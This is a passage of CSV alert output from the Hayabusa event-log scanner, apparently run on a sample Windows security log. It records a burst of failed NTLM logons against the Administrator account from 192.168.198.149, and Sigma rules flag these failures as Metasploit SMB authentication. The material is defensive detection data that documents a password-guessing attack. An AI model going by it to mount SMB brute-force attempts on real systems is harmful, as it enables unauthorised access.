NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.778 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 94JvBKdxJkawQQMT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KgBMk00K3iC1GQem : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XdGOj9Ybm6bcCo3p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: by6F4YKorxhp5ahn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.950 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b1G6ZOgOaV6luDQN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.046 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qqSwNfvpPLQd6ZH1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.046 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.087 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: mxtJJj54xSzHibHI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.087 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Y3yznfdaZ7dtwDO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.129 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esllFn4asbLxwkBu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Pr0cgd6cF5ukhZ8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.202 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pS2fabTrbl6rZ1NB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.249 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FkylDDmUyuT57HdH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.305 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Aqs8rSvuLAQuhfDp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.337 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KI07KTgBJc4kBSKY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Re3n3nJ8EEhRRT3G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.421 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BzspAC3z1csEn0Ve : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.465 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: tpkb6bf42SLUst3z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.505 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.546 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1F5d2wn60OgAExW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.546 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bhPNRHWhTyonDPuA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.642 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zEsnyWpUuHVBo6et : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.642 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I2FwaWy9TALkk9eU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.685 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fuikeQsxlOUVifVj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.778 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZWdsRJp9fHypPI1d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B0j0IBX2eZnx99n9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YIZ5Knxg0xr0WmDb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.909 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wuej3f7mEoWmd4SX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.953 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.998 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: B0LcCi06ilIhFPwb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.998 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jWsCGgoFmH06rRf4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.041 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bP47JjNKqtYIZPsC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.093 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mNlWZ9o0xf7bl2d0 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.140 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hnPnB2lEN3BSDpXJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.186 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dVMyeF9jGuzHkTHg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sDKLl3PjW2qrzJGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.269 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rkllnePSq3NQ5wgC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9qLWgQnR7P9cs7s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.359 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C1AdU07nzvv7RB2i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.408 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: cHgiB5SMiQtsl5oD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.452 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 03e7QOn36l0jH35H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.499 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DoJBywV8x8cURwrO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.548 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.583 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SDYGYO6s6g6Dbx8r : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.583 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nUqXpeTNePFyBmCo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.621 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T2h0qJWcbzRe1GSj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: edsfNOovOl1Ow503 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cxCC83XLMIJrNMvl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.740 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MzussOcg5ihdrnD0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.785 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 55l4HKICu8x0FpQv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.891 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
